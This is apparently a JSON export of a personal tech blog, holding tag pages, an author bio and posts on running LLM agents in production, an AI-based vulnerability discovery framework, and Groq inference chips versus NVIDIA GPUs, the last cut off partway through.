[{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/tags/agents/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Agents","type":"tags"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/categories/ai/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"AI","type":"categories"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/tags/ai/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"AI","type":"tags"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/series/ai-models--releases/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"AI Models \u0026 Releases","type":"series"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/tags/architecture/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Architecture","type":"tags"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":" Browse by Topic # Posts are organized into broad categories reflecting the main areas covered on this blog:\nAI \u0026amp; Machine Learning — Articles covering artificial intelligence advances, machine learning frameworks, LLMs, and the broader AI landscape. Start here if you\u0026rsquo;re tracking AI developments, evaluating models, or learning about AI\u0026rsquo;s impact on technology and society.\nSecurity \u0026amp; Privacy — In-depth coverage of cybersecurity threats, defensive strategies, vulnerability disclosure, and security best practices. Includes both defensive security and security incident analysis for practitioners and architects.\nDevelopment — Programming languages, frameworks, tooling, and software development practices. From JavaScript runtimes to Python evolution, testing approaches to code quality.\nInfrastructure \u0026amp; Operations — Cloud platforms, container orchestration, observability, performance optimization, and the operational practices that keep systems running. Coverage of AWS, Azure, Google Cloud, and Kubernetes.\nOpen Source — Analysis of the open source ecosystem, licensing challenges, community dynamics, and how open-source projects sustain themselves.\nIndustry \u0026amp; Business — Technology industry analysis, market trends, company strategies, funding dynamics, and the business decisions shaping the tech landscape.\nRecommended Starting Points # Interested in AI? Browse the AI category or explore the AI Models \u0026amp; Releases and AI Industry \u0026amp; Regulation series Building secure systems? Start with the Security category or the Cybersecurity Landscape and Supply Chain Security series Managing infrastructure? Explore the Infrastructure category or the Cloud Operations and Kubernetes \u0026amp; Containers series Following a specific language? Check the Development category or language-specific series like JavaScript \u0026amp; Node.js, Python Evolution, or Systems \u0026amp; Emerging Languages All Series # A deeper dive into specific topic areas is available through our complete series list\n","date":"8 June 2026","externalUrl":null,"permalink":"/categories/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"Blog Categories: AI, Security, Development \u0026 Infrastructure","type":"categories"},{"content":" Explore In-Depth Series # Rather than one-off articles, these series provide sustained coverage of important technology topics. Each series organizes related posts into a coherent narrative, helping you understand how technologies evolve and what the developments mean.\nTechnology \u0026amp; Programming # JavaScript \u0026amp; Node.js — The JavaScript ecosystem in motion: Node.js, Deno, Bun, and the evolution of server-side JavaScript development\nPython Evolution — Tracking Python\u0026rsquo;s development, performance improvements, type system advances, and dominance in AI/data science\nSystems \u0026amp; Emerging Languages — Rust, Go, Zig, and the systems programming renaissance reshaping infrastructure\nDeveloper Tooling — IDEs, build systems, CI/CD platforms, AI coding assistants, and tools that shape development experience\nAI \u0026amp; Machine Learning # AI Models \u0026amp; Releases — Foundation model announcements, benchmarks, and what new AI capabilities mean for development\nAI Industry \u0026amp; Regulation — Business, policy, and regulation shaping AI\u0026rsquo;s future; investments and geopolitical dynamics\nOpen Source AI — Open-weight models, fine-tuning, licensing, and the open-source alternative to proprietary AI\nSecurity # Cybersecurity Landscape — Threat trends, defensive strategies, security tooling, and evolving security practices\nBreaches \u0026amp; Zero-Days — Analyzing significant security breaches, vulnerabilities, and lessons for defenders\nSupply Chain Security — Software supply chain attacks, dependency vulnerabilities, and securing the build pipeline\nInfrastructure \u0026amp; Cloud # Cloud Operations — Monitoring, cost optimization, incident response, and operational practices for cloud systems\nCloud Platform Watch — New features, pricing changes, and strategic moves from AWS, Azure, Google Cloud\nKubernetes \u0026amp; Containers — Container orchestration, Kubernetes operations, and the container ecosystem\nIndustry \u0026amp; Open Source # Industry \u0026amp; Platforms — Technology industry analysis: platform strategies, acquisitions, market dynamics, and competitive shifts\nOpen Source Chronicles — Governance, licensing, community dynamics, and the stories from the open source world\nHow to Use These Series # New to a topic? Start with the series overview to understand scope and learning path, then explore individual articles in reading order\nStaying current? Subscribe to updates or check back regularly—new articles are added to existing series as developments warrant\nDeep dive? Use the learning path and key topics in each series overview to understand what areas matter most for your use case\nCross-topic insights? Notice the related series mentioned in each series overview—technology trends often connect across multiple areas\n","date":"8 June 2026","externalUrl":null,"permalink":"/series/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","type":"series"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/tags/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","type":"tags"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/tags/development/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Development","type":"tags"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/tags/llm/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"LLM","type":"tags"},{"content":"Six months ago, talking about \u0026ldquo;agent-based systems\u0026rdquo; at an enterprise architecture meeting would have gotten you some skeptical looks. Today, it\u0026rsquo;s the question every engineering leader is asking: \u0026ldquo;How do we move our LLMs from chatbots into autonomous agents?\u0026rdquo;\nThe shift is real, and it\u0026rsquo;s reshaping how teams think about AI deployment. We\u0026rsquo;re moving past the era of \u0026ldquo;ChatGPT in a product\u0026rdquo; into the era of \u0026ldquo;systems that coordinate complex workflows without human intervention.\u0026rdquo; This is harder than it sounds, and the teams getting it right are finding that the architectural challenges are bigger than the model challenges.\nI\u0026rsquo;ve been working with several companies navigating this transition over the past few months. What I\u0026rsquo;m seeing is a clear inflection point: companies that treat LLM agents as a straightforward extension of chatbot UX are going to struggle. The ones that respect the architectural complexity are building systems that are genuinely useful.\nFrom Chat Interfaces to Autonomous Workflows # Let me be concrete about what\u0026rsquo;s changed. A year ago, the standard pattern was: \u0026ldquo;We built a chat interface to GPT-4 and deployed it.\u0026rdquo; That worked fine for customer support, basic information retrieval, and copilot-style interfaces where a human is involved in every decision.\nToday\u0026rsquo;s pattern is different: \u0026ldquo;Our system receives a request, spawns multiple specialized agents to investigate different aspects in parallel, orchestrates their findings, flags risks, and executes or recommends an action — all without waiting for human feedback.\u0026rdquo;\nThat\u0026rsquo;s not a chat interface. That\u0026rsquo;s a distributed system.\nThe classic example is code analysis. Instead of asking a single LLM \u0026ldquo;analyze this codebase for security issues,\u0026rdquo; you can spawn agents that run in parallel: one analyzing dependency trees, another scanning authentication patterns, another looking for SQL injection vectors, another auditing data handling. They report their findings to an orchestrator, which synthesizes them into a coherent risk assessment. The whole workflow completes in seconds, and each agent has a specific job it\u0026rsquo;s optimized for.\nThis architecture mirrors what we\u0026rsquo;ve learned from microservices, except the \u0026ldquo;services\u0026rdquo; are LLMs with specific prompts and contexts. And just like microservices, this brings real power but also real complexity.\nThe Architecture That Actually Works in Production # The teams I\u0026rsquo;m advising are converging on a few core patterns:\nThe Orchestration Layer sits at the center. It\u0026rsquo;s not an LLM — it\u0026rsquo;s a state machine or a workflow engine that knows how to spawn agents, collect their results, handle failures, and make decisions about what happens next. This is where most engineering complexity lives. Some teams are writing this themselves. Others are adopting frameworks like LangGraph or AutoGen. The choice matters less than recognizing that you need this layer.\nSpecialized Agents are narrow and focused. An agent that \u0026ldquo;does everything\u0026rdquo; is an agent that does nothing well. The ones that work in production have a specific domain: \u0026ldquo;you analyze database queries,\u0026rdquo; \u0026ldquo;you audit permissions,\u0026rdquo; \u0026ldquo;you generate test cases.\u0026rdquo; Each agent has a fixed set of tools it can call, a specific prompt optimized for its domain, and known constraints. This is the opposite of the \u0026ldquo;general-purpose AI\u0026rdquo; narrative we hear in marketing.\nMemory and State is the hidden complexity. In a chat interface, context is simple — it\u0026rsquo;s the conversation history. In a multi-agent system, you have shared state (what did Agent A discover?), individual agent state (is Agent B still thinking?), and the overall workflow state (have we collected enough information to make a decision?). Getting this wrong means agents hallucinate, repeat work, or get stuck in loops. The teams handling this best are treating agent state like database transactions — with explicit commit points, rollbacks, and consistency guarantees.\nI worked with one fintech startup that spent weeks debugging an issue where agents were making conflicting recommendations. It turned out that two agents were reading stale state — they\u0026rsquo;d both queried the same account information 500ms apart, and the data had changed in between. That\u0026rsquo;s a distributed systems problem, not an AI problem. They needed to add explicit state versioning and locks.\nError Recovery and Graceful Degradation matter more in production than in prototypes. What happens if an agent times out? What if a tool call fails? What if an agent confidently produces a wrong answer? The best systems I\u0026rsquo;ve seen treat these cases explicitly: they have fallback agents, they log unexpected behaviors for human review, they can degrade to simpler workflows if complex ones fail. This is boring engineering, but it\u0026rsquo;s essential.\nTool Integration: The Real Bottleneck # Here\u0026rsquo;s something that surprised me: the bottleneck in agent systems isn\u0026rsquo;t the LLM, it\u0026rsquo;s the tools.\nWhen an agent needs to take action — query a database, call an API, write to a file system, trigger a deployment — it has to be deeply integrated with your infrastructure. And every integration is a potential security boundary, a failure mode, a place where the agent can go wrong.\nThe teams doing this well have built abstraction layers. Instead of giving an agent direct access to your production database, you build a small API service that exposes specific, safe queries. Instead of direct file system access, you expose a file upload API with strict constraints. This is more work upfront, but it means you can scale the number of agents without scaling the security audit effort linearly.\nOne team I worked with was about to give agents direct access to their AWS account via boto3. I suggested we build a small safety layer instead — a service that agents query, which then validates requests against a policy before executing them. It added maybe two days of work. It prevented what could have been a catastrophic mistake.\nThis pattern echoes what we\u0026rsquo;ve learned from cloud infrastructure security: don\u0026rsquo;t scale complexity; scale abstraction. Agents should not see your actual infrastructure. They should see a carefully curated interface to it. AWS best practices for service authentication and the principle of least privilege apply directly to agent tool access control.\nMemory Management at Scale # I\u0026rsquo;ve talked with teams running hundreds of concurrent agents, and they all hit the same wall: memory management becomes the limiting factor.\nEach agent needs context. If you\u0026rsquo;re storing the full conversation history, the full state of the system, and the full output of prior agents, you can fit maybe ten concurrent agents on a reasonable machine before memory explodes. One team hit this at exactly nine agents running in parallel on their setup.\nThe solution is ruthless context pruning. You keep the last N steps of the workflow, you summarize intermediate results, you only pass agents the information they need to make their decision. You trade some theoretical completeness for practical scalability.\nThe other emerging pattern is using specialized storage. Instead of keeping everything in memory, you store the full state in a fast KV store (Redis, DynamoDB) and only load what each agent needs into its context window. This adds latency, but it\u0026rsquo;s a tradeoff most production systems are willing to make.\nThink of it like database query optimization. You\u0026rsquo;re reducing the working set to what actually matters. Extended thinking models like Claude\u0026rsquo;s latest release give agents more cognitive capacity for reasoning, but you still need to manage how much context you\u0026rsquo;re passing to them.\nThe Agent Orchestration Patterns That Scale # The orchestrator is where the craft lives. I\u0026rsquo;m seeing three major patterns emerge:\nSequential orchestration is straightforward: Agent A completes, its output goes to Agent B, which completes, output goes to Agent C. This is the easiest to reason about, but it\u0026rsquo;s slow — you can\u0026rsquo;t parallelize. Use this when order matters and latency isn\u0026rsquo;t critical.\nParallel orchestration spawns multiple agents at once (like the code analysis example earlier) and waits for all results before proceeding. This is faster but more complex — you need to handle partial failures (what if one agent errors?), manage concurrent state updates, and synthesize conflicting results.\nConditional/Branching orchestration routes based on results. \u0026ldquo;If Agent A found a critical security issue, invoke the Security Agent. Otherwise, proceed to the standard review.\u0026rdquo; This is the most flexible but also the most complex. You need a clear state machine to avoid infinite loops or contradictory branches.\nThe best systems I\u0026rsquo;ve seen combine all three, depending on the workflow. Most workflows are 70% sequential (this step logically depends on the last one), 20% parallel (these aspects can be analyzed independently), and 10% conditional (some paths fork based on results).\nThe Debugging and Observability Crisis # Here\u0026rsquo;s a problem nobody talks about enough: agent systems are incredibly hard to debug.\nWhen a chatbot gives a wrong answer, you can see the conversation and ask the user what went wrong. When an agent system makes a wrong decision, you have to trace through:\nWhat instructions did it receive? What tools did it call? What were the results? What state was it operating from? Did it have conflicting information? Where exactly did it diverge from what should have happened? One team spent two days debugging why an agent kept recommending the wrong approach to a customer. Turns out the agent was reading stale state — a previous customer\u0026rsquo;s information was cached in its context. By the time they figured it out, the system had already made bad recommendations to twelve customers.\nThe solution is comprehensive observability. Every agent call, tool invocation, state update, and decision needs to be logged with context. You need to be able to replay the entire execution trace. You need to know not just what the agent decided, but why it decided it, what alternatives it considered, and what data it was working from. Frameworks like LangSmith and observability platforms like Datadog APM provide purpose-built tools for this. The OpenTelemetry specification offers standardized instrumentation patterns that work across agent frameworks.\nThis is more engineering overhead than most teams budget for. But I\u0026rsquo;d argue it\u0026rsquo;s non-negotiable in production. If your agent system is making decisions that affect customers or business outcomes, you need to be able to explain those decisions after the fact.\nTeams That Got It Right # The companies navigating this successfully share a few traits:\nFirst, they\u0026rsquo;re clear about scope. They\u0026rsquo;re not trying to build a general-purpose autonomous system. They\u0026rsquo;re building a system for a specific problem: contract analysis, incident response, customer onboarding, code review — something concrete with defined success criteria.\nSecond, they\u0026rsquo;re paranoid about safety. They assume agents will occasionally make wrong decisions, and they build detection and correction mechanisms into the workflow. They don\u0026rsquo;t assume \u0026ldquo;better models = fewer mistakes.\u0026rdquo; They engineer for mistakes to happen and be caught. Safety evaluation frameworks like HELM and adversarial testing approaches provide structured methodologies for identifying failure modes.\nThird, they\u0026rsquo;re patient with infrastructure. They don\u0026rsquo;t try to run production agent systems on a weekend hack. They invest in proper orchestration frameworks, observability, state management, and tool safety layers. This work isn\u0026rsquo;t glamorous, but it\u0026rsquo;s essential.\nFourth, they\u0026rsquo;re honest about limitations. I\u0026rsquo;ve yet to meet a team that successfully deployed agents without human oversight loops. The pattern is: agents do the work, humans review the high-risk decisions or outcomes. This isn\u0026rsquo;t a failure of the approach — it\u0026rsquo;s a realistic assessment of what autonomous systems can do today.\nThe Talent Gap # One thing I haven\u0026rsquo;t mentioned enough: building production agent systems requires different skills than building chatbots.\nYou need systems engineers who understand distributed state management, not just prompt engineers who know how to coax better outputs from LLMs. You need people who understand failure modes and recovery, not just people who read LLM documentation. You need people who treat agent systems like infrastructure, not like clever scripts.\nMost companies have the second group and lack the first. This is creating a talent bottleneck. If you\u0026rsquo;re hiring right now for agent teams, you want systems engineers with platform experience, not just AI engineers with ChatGPT experience. The skill transfer is real but non-trivial.\nThe Next Phase: Agents Coordinating Other Agents # Once you have one agent system working, the next logical step is having agents spawn other agents. This is where things get genuinely complex.\nImagine a system where a high-level agent receives a business request, decomposes it into subproblems, spawns sub-agents to handle each subproblem, aggregates their results, and decides on a final action. Each sub-agent might spawn its own sub-agents. This is a recursive, hierarchical agent system — and it\u0026rsquo;s where the hardest problems live.\nHow do you prevent infinite recursion? How do you track state across multiple levels? How do you handle a sub-agent that takes an hour to complete? How do you debug a problem that emerged from a sub-agent\u0026rsquo;s sub-agent\u0026rsquo;s decision?\nI haven\u0026rsquo;t seen this pattern in production yet. A few teams are experimenting with it, and the ones I\u0026rsquo;m advising are treating it carefully. It\u0026rsquo;s the next frontier, but it\u0026rsquo;s not \u0026ldquo;ready\u0026rdquo; for mission-critical systems. Give it another year.\nMy Take # The shift from chat interfaces to production agent systems is real and accelerating. But it\u0026rsquo;s not a simple \u0026ldquo;bigger models = better agents\u0026rdquo; story. It\u0026rsquo;s a complex architectural problem that requires systems thinking, careful engineering, and honest assessment of limitations.\nThe companies that get this right will have significant competitive advantages. Being able to automate complex, knowledge-intensive workflows autonomously is genuinely valuable. But the path there is longer and more engineering-intensive than most teams expect.\nIf you\u0026rsquo;re considering agent systems for your organization, start with a specific, bounded problem. Don\u0026rsquo;t try to solve everything at once. Invest in orchestration, observability, and safety mechanisms upfront. Assume agents will occasionally be wrong and build detection and correction into your workflows. And hire systems engineers, not just AI enthusiasts.\nThe technology is ready. The hard part is building the systems discipline to use it safely. The teams that respect that challenge will ship production agent systems that actually work. The teams that see it as \u0026ldquo;just add AI\u0026rdquo; will learn some expensive lessons the hard way.\nProduction LLM agents are here. The question isn\u0026rsquo;t whether to use them. It\u0026rsquo;s how to use them responsibly at scale.\n","date":"8 June 2026","externalUrl":null,"permalink":"/posts/260608-llm-agents-production/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Multi-agent LLM systems are shifting from experimental chat interfaces to autonomous production systems. Here’s what production deployment actually looks like, and why the architectural patterns matter more than the models.","title":"LLM Agents in Production — Moving Beyond Chat Interfaces","type":"posts"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/authors/osmond-van-hemert/","section":"Authors","summary":"","title":"Osmond Van Hemert","type":"authors"},{"content":"I\u0026rsquo;m Osmond — a senior software engineer based in The Netherlands, with 30 years of experience and the last decade spent mostly remote. My day job is mostly TypeScript on Node, React, and Kubernetes; my evenings are AI coding agents, a homelab that I keep promising myself I\u0026rsquo;ll downsize, and trying to keep up with the supply-chain security news cycle. Every Thursday since 2020 I write down what I learned that week — that\u0026rsquo;s this site.\n","date":"8 June 2026","externalUrl":null,"permalink":"/","section":"Osmond van Hemert — Senior Software Engineer","summary":"","title":"Osmond van Hemert — Senior Software Engineer","type":"page"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/posts/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"","title":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","type":"posts"},{"content":"","date":"6 June 2026","externalUrl":null,"permalink":"/series/ai-in-development/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"AI in Development","type":"series"},{"content":"Anthropic just released defending-code-reference-harness, an open-source framework for automated vulnerability discovery powered by AI. The timing is significant, and the implications are profound. We\u0026rsquo;re watching the gap between manual security code review and automated vulnerability detection close in real time — and AI is doing the closing.\nThis framework represents exactly the kind of practical AI application that I discussed during the RSA Conference 2024 AI security panel — not flashy generative demos, but tools that solve real developer problems with real business impact.\nThis isn\u0026rsquo;t a small tool or a niche experiment. The Hacker News response (372 upvotes) reflects something the security community has been waiting for: a practical, production-ready approach to using large language models not for code generation, but for security analysis. That\u0026rsquo;s a different problem, and Anthropic\u0026rsquo;s framework shows you can apply AI language understanding to catch things that static analysis and pattern matching consistently miss.\nWhy AI for Vulnerability Discovery? # Let me be honest about where we are with vulnerability detection today. Static analysis tools — Snyk, Semgrep, CodeQL — are excellent for known patterns. They scale. They\u0026rsquo;re fast. They integrate into CI/CD pipelines. But they operate within the constraints of what you can express as rules. They catch SQL injection when you pass untrusted input to a database query. They catch the obvious cases.\nWhat they miss are the subtle cases. The business logic vulnerability. The authorization check that looks correct but isn\u0026rsquo;t enforced on a secondary code path. The timing attack in cryptographic code. The off-by-one error in a buffer boundary check that most linters won\u0026rsquo;t flag because the code isn\u0026rsquo;t explicitly dangerous — it\u0026rsquo;s just subtly wrong.\nThese are the vulnerabilities that security researchers find through patient, expensive manual code review. A senior engineer who has spent years understanding both application code and attack primitives can look at a function and see the flaw. But you can\u0026rsquo;t hire enough of those people, and even if you could, the process doesn\u0026rsquo;t scale to the codebases we\u0026rsquo;re building today.\nAnthropic\u0026rsquo;s framework bridges that gap by doing something conventional tooling can\u0026rsquo;t: it understands context, follows logic chains, and reasons about security implications in ways that require language understanding, not just pattern matching.\nHow It Works in Practice # The framework isn\u0026rsquo;t magic. It\u0026rsquo;s a well-engineered system for using Claude to systematically analyze code for potential vulnerabilities. Here\u0026rsquo;s the key insight: you give Claude the code, context about what it\u0026rsquo;s supposed to do, and examples of the kinds of vulnerabilities you care about. The model then reasons through the code, identifies potential issues, and explains its findings.\nWhat makes this different from \u0026ldquo;just ask Claude to review your code\u0026rdquo; is the engineering discipline. The framework includes:\nPrompt engineering patterns that structure how to ask Claude questions about security in ways that elicit useful analysis rather than generic commentary. Iterative analysis — multiple passes over the same code, each asking different questions to build a comprehensive picture. Integration patterns for turning AI analysis into actionable findings that developers can act on without being drowned in false positives. Chain-of-thought reasoning — Claude shows its work, explaining why something is a vulnerability, not just flagging it. This last part is crucial. When a static analysis tool flags something, it tells you the rule that matched. When Claude analyzes code, it can explain the security implication in terms of how an attacker could actually exploit the issue. That context dramatically increases the signal-to-noise ratio for developers.\nThe Vulnerability Blind Spots This Addresses # In my experience consulting with teams on security, there are classes of vulnerabilities that consistently slip through because they\u0026rsquo;re not amenable to automation. These are the gaps that traditional tools like Snyk and CodeQL (excellent as they are) struggle with:\nBusiness Logic and Authorization Flaws # A discount code that can be applied multiple times when it should only work once. A permission check that works for the main flow but not for an edge case. These require understanding what the code is supposed to do, not just analyzing syntax.\nAuthorization boundary issues. A function that enforces authorization for direct calls but not for calls from other internal functions. A public method that should be private. Multi-tenant systems where authorization checks are incomplete.\nInformation disclosure through side channels. Subtle timing variations in cryptographic implementations. Error messages that leak information about whether a user exists. Cache behavior that can be exploited to determine sensitive information.\nIncorrect error handling in security context. Exceptions caught too broadly, swallowing security-critical information. Errors that trigger recovery code paths that bypass security checks.\nConcurrency and state management bugs. Race conditions in authorization checks. Non-atomic operations that should be atomic. State that\u0026rsquo;s shared between requests when it should be isolated.\nThese vulnerabilities share something in common: they\u0026rsquo;re not violations of a discrete rule, they\u0026rsquo;re violations of intent. Static analysis struggles with intent. AI doesn\u0026rsquo;t. This is why Claude\u0026rsquo;s reasoning capabilities matter — the model needs to understand not just code syntax, but the semantic intent behind it. OWASP\u0026rsquo;s categorization of authorization flaws attempts to capture these patterns, but detection remains fundamentally a reasoning problem.\nIntegration Into Development Workflow # Here\u0026rsquo;s where the practical value emerges. The framework is designed to fit into existing development workflows, not replace them. You\u0026rsquo;re not ditching your Snyk integration. You\u0026rsquo;re adding an additional layer of analysis that catches what Snyk doesn\u0026rsquo;t.\nThink of it this way: static analysis is your gatekeeper, catching 80% of issues through pattern matching. AI analysis is your expert consultant, coming in on higher-risk code and business-critical functions to catch the remaining 20% that requires reasoning.\nFor security-critical code — authentication, authorization, cryptography, payment processing — running the Anthropic framework as part of your pull request review process makes sense. Yes, you\u0026rsquo;ll spend API credits. But the cost of a single undetected vulnerability in production — in remediation, customer communication, and reputation damage — dwarfs the cost of running comprehensive AI analysis.\nThe framework includes examples of how to structure this: run it against modified files in a PR, get structured findings, surface them in the PR comments, let developers respond. It integrates with the tools you already use.\nThe Supply Chain Security Angle # This framework also matters in a supply chain context, which I\u0026rsquo;ve written about extensively. As third-party dependencies become increasingly security-critical, and as supply chain attacks continue to evolve, the ability to do rapid, comprehensive security analysis of code before deployment becomes essential.\nThe Codecov supply chain incident in 2021 showed us how quickly security tooling itself can become a vector for compromise. Being able to apply AI analysis to the code you\u0026rsquo;re about to trust your entire build pipeline to is not just a nice-to-have — it\u0026rsquo;s becoming essential risk management.\nImagine applying this framework to your critical dependencies before updating them. You\u0026rsquo;re not doing manual security review of every transitive dependency (impossible), but you are applying automated AI analysis to the code paths you actually use. For organizations building on top of open-source foundations, this is a meaningful way to increase confidence in your supply chain.\nThe Reality Check # I need to be clear about what this is not: it\u0026rsquo;s not a replacement for threat modeling, security architecture review, or pen testing. Those are fundamentally different activities that require different expertise and approaches.\nWhat it is: a tool that amplifies the leverage of security-aware developers. A developer who understands security can use this framework to catch more issues in their own code before review. A security team can use it to do more thorough reviews of critical code paths with the same headcount.\nThere are also legitimate concerns about bias in AI-generated analysis. Claude is trained on code from the internet, which includes plenty of insecure code. You need to validate that the framework isn\u0026rsquo;t just finding \u0026ldquo;common patterns\u0026rdquo; but actually understanding security principles. Anthropic\u0026rsquo;s approach of making this open-source means the community can audit and improve it, which is the right move.\nWhat This Means for the Security Stack # We\u0026rsquo;re at an inflection point in how security tooling works. For the past decade, the trend has been: more rules, better pattern matching, faster scanning. That approach has hit its limits. You can\u0026rsquo;t express every possible vulnerability as a rule. You can\u0026rsquo;t pattern-match your way to understanding business logic.\nThe next era is: automated reasoning. Using language models that can understand code in context and reason about security implications. Claude 3 and beyond are the foundational capability that makes this possible. Anthropic\u0026rsquo;s research on constitutional AI and reasoning informs how the vulnerability discovery framework approaches security analysis.\nI expect to see waves of security tooling over the next 12-18 months that layer AI reasoning on top of traditional static analysis. Some will be good, some will be hype and vapor. Anthropic\u0026rsquo;s framework is good because it\u0026rsquo;s grounded in actual security challenges and released as open-source reference implementation on GitHub, not a black-box SaaS offering that you have to trust completely.\nCompare this to proprietary tools that hide their analysis methodology — with open-source frameworks like this one, you can audit what the AI is doing, add domain-specific vulnerability patterns, and adapt it to your organization\u0026rsquo;s specific risk profile. That transparency is essential for any security tool that\u0026rsquo;s going to make decisions about what gets deployed. This aligns with CISA\u0026rsquo;s secure software development framework and the industry\u0026rsquo;s push toward verifiable security practices.\nMy Take # Anthropic\u0026rsquo;s vulnerability discovery framework is one of the most practically useful applications of LLMs I\u0026rsquo;ve seen in security. It doesn\u0026rsquo;t promise to find every vulnerability (nothing does). It doesn\u0026rsquo;t replace security expertise. But it does something tangible: it lets organizations with moderate security resources apply something closer to expert-level analysis to code that matters most.\nI\u0026rsquo;ve been building software long enough to remember when security code review was done by anyone available, then by specialized teams, then by rotating senior developers, then by external security firms. Each evolution was driven by the same pressure: more code than people, and security defects are catastrophically expensive.\nAI isn\u0026rsquo;t the final answer to that pressure, but it\u0026rsquo;s a meaningful step forward. The framework is open-source, the code is well-written, and Anthropic has clearly thought about how this integrates into real development workflows. If you\u0026rsquo;re building security-critical code and you\u0026rsquo;re not yet experimenting with AI-assisted analysis, this is the time to start.\nThe next generation of secure development practices will be built with these tools as a foundation.\n","date":"6 June 2026","externalUrl":null,"permalink":"/posts/260606-anthropic-vulnerability-discovery-framework/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic released an open-source framework for automated vulnerability discovery powered by AI. This represents a fundamental shift in how security analysis can scale — from manual expert review to AI-assisted code hardening at development time.","title":"Anthropic's AI Vulnerability Discovery Framework — Automating Security at Code Level","type":"posts"},{"content":"","date":"6 June 2026","externalUrl":null,"permalink":"/tags/cybersecurity/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Cybersecurity","type":"tags"},{"content":"","date":"6 June 2026","externalUrl":null,"permalink":"/categories/security/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"Security","type":"categories"},{"content":"","date":"6 June 2026","externalUrl":null,"permalink":"/tags/security-tooling/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Security Tooling","type":"tags"},{"content":"","date":"4 June 2026","externalUrl":null,"permalink":"/tags/ai-infrastructure/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"AI Infrastructure","type":"tags"},{"content":"","date":"4 June 2026","externalUrl":null,"permalink":"/tags/cloud-computing/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Cloud Computing","type":"tags"},{"content":"Last month, Groq released new benchmarks showing their custom LPU (Language Processing Unit) chips significantly outperforming NVIDIA\u0026rsquo;s latest H100 GPUs on standard LLM inference workloads. The numbers are striking: 2-3x throughput improvements for inference tasks, lower power consumption, and — this is the part that matters — lower total cost of ownership at scale.\nLet\u0026rsquo;s be honest about what happened here: for the past three years, NVIDIA has been untouchable. If you needed to run AI workloads, you bought GPUs. It wasn\u0026rsquo;t a choice, it was a law of physics. Every major cloud provider, every AI startup, every infrastructure team I\u0026rsquo;ve consulted with has been locked into the same equation: scale inference = buy more H100s.\nGroq\u0026rsquo;s LPU chips might change that equation.\nI\u0026rsquo;m not saying this is the end of NVIDIA dominance. NVIDIA has too much momentum, too much ecosystem investment, too much customer lock-in. But for the first time in years, there\u0026rsquo;s a legitimate alternative for a specific, critical workload: cost-sensitive inference at scale. If you\u0026rsquo;re running inference workloads where latency isn\u0026rsquo;t your primary constraint and cost is, Groq\u0026rsquo;s infrastructure starts to look very interesting.\nThe LPU Architecture: Why It Matters # Here\u0026rsquo;s the core technical difference: NVIDIA GPUs were designed to be general-purpose parallel processors. They\u0026rsquo;re good at inference, but they\u0026rsquo;re also good at training, graphics, scientific computing, and everything else. That generality is both a strength and a constraint.\nGroq\u0026rsquo;s LPU chips are purpose-built for LLM inference specifically. No training. No graphics. No compromises. The architecture is optimized entirely around the computational patterns that large language models actually exhibit: matrix operations for embeddings and attention layers, sequential token generation, and the specific memory access patterns of transformer networks.\nThe result: when specialized hardware meets optimized algorithms, efficiency gains compound. Groq achieves higher throughput on inference workloads while consuming significantly less power than equivalent GPU setups. In real infrastructure terms, that means fewer chips to buy, less power infrastructure to build, less cooling capacity required, and lower ongoing energy costs.\nThis matters in a specific context. The economics of LLM serving changed fundamentally over the past 18 months. When inference was new and novel, latency was the obsession — everyone wanted sub-100ms response times. But as these systems moved to production, it became clear that for most applications, inference latency below 500ms is acceptable. What actually matters at scale is throughput (tokens per second) and the cost per inference request.\nThat shift in priorities opens the door for specialized hardware. NVIDIA GPUs are fantastic at low-latency inference. Groq\u0026rsquo;s LPU chips are fantastic at high-throughput, cost-optimized inference. For most real-world workloads — customer support chatbots, content generation, batch processing — the throughput metric is more important.\nWhy NVIDIA Isn\u0026rsquo;t Worried Yet (But Should Be Watching) # NVIDIA\u0026rsquo;s dominance isn\u0026rsquo;t threatened tomorrow. Here\u0026rsquo;s why:\nEcosystem momentum. Every major cloud provider (AWS, Azure, GCP) has massive investments in GPU infrastructure. Engineers have CUDA expertise. Models are optimized for NVIDIA\u0026rsquo;s hardware. Libraries, frameworks, everything is built around GPUs. You don\u0026rsquo;t unwind that overnight.\nTraining workloads. Groq\u0026rsquo;s LPU chips are optimized for inference. Training still requires GPU-grade flexibility and massive parallel compute, and NVIDIA owns that space completely. Every organization training custom models is locked into 